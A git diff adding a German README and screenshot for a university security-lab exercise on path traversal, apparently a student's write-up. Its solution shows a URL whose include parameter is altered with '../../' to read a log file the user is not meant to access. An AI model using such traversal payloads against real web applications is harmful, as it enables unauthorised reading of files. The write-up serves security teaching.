diff --git a/path-traversal/README.md b/path-traversal/README.md
new file mode 100644
index 0000000..20c3b84
--- /dev/null
+++ b/path-traversal/README.md
@@ -0,0 +1,23 @@
+# Path Traversal
+
+Gegeben ist ein Minibrowser ohne URL-Leiste.
+Ziel ist das Einlesen von Dateien,
+auf die wir eigentlich keinen Zugriff haben sollen.
+
+![](path-traversal.png)
+
+## Lösung
+
+Laut dem Hinweis sollen wir die URL im Browser anschauen:
+```
+https://securitylab.sit.tu-darmstadt.de/index.php/task/show/546?include=start.php
+```
+Die Beschreibung weist uns auf `start.php` hin:
+```
+[unknown]/logs/tuid.log
+[unknown]/public_html/views/start.php
+```
+Wir können mittels [`..` auf Elternverzeichnisse zugreifen](https://superuser.com/questions/153165/what-does-represent-while-giving-path/153175#153175):
+```
+https://securitylab.sit.tu-darmstadt.de/index.php/task/show/546?include=../../logs/tuid.log
+```
diff --git a/path-traversal/path-traversal.png b/path-traversal/path-traversal.png
new file mode 100644
index 0000000..3c7407e
Binary files /dev/null and b/path-traversal/path-traversal.png differ